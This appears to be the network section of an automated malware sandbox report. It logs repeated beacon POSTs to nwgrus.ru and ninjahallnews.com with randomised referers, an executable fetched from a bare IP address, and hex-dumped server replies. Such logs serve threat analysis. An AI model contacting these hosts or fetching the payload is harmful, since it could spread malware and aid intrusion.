      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://dcegxttxxlsj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://mqhltxselyb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fopeiyjgdmtd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 244 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bwtyrvoeqafgvbf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 300 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xghchnsekruohq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 111 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sexbgcirilxygdjd.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 362 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://iahhcvfewaqau.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 159 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://eqcqgpejtwdt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 197 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wecknsvepmdnww.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 118 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bhtdcxedsrrbqyo.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 125 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fdkltibbufmpdfhy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 188 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xbdoluaokmu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 251 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ayakqtnprwclxx.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 263 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://iplbmyqhcsowave.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 241 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rdhamasxmtwwkau.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 306 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://floxumtvcvrlyy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 256 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mjtfeuwpovhathn.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 112 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nggsthvsetexec.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 255 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lrkgjwlbfxyrmp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 225 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wvxsqrgovrq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 205 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ivjlkhscvhyfno.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 151 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gwvqwjkmpeg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 204 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cqnqsxdlukmk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 302 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dlawyaqdtqgx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 357 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gxrfdgbwqcu.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 368 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mihbhgkrdwqnogym.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 287 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bhprxmbpfsifjwvd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 187 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vqoayhqrgjlg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 189 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cmfmcxiuegbxwbfb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 173 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bojujhdxlnt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 243 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lbaiglgwxhkmq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 222 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://oxivfaqdhau.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 292 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://eihcpyqadleca.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 307 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://olgjjvecsjugbyj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 128 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wjiuupaachvppk.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 288 | Host: nwgrus.ru
      Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://csuhbuxabuhlm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 275 | Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lixbbuexbbyxijy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snydbdaflsjf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://toxykxlssds.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wujymmrsholuwdm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anhllontjkcoc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfdglghjacuv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efoitwxyetuahvcx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wgvksgwflrvxis.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: nwgrus.ru
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: global trafficDNS traffic detected: DNS query: ninjahallnews.com
      Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://pdafocuyeqbl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:20:42 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:21:00 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:21:01 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:21:11 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:22:27 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:22:49 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 22:23:14 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:19:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 ed Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:19:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:19:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
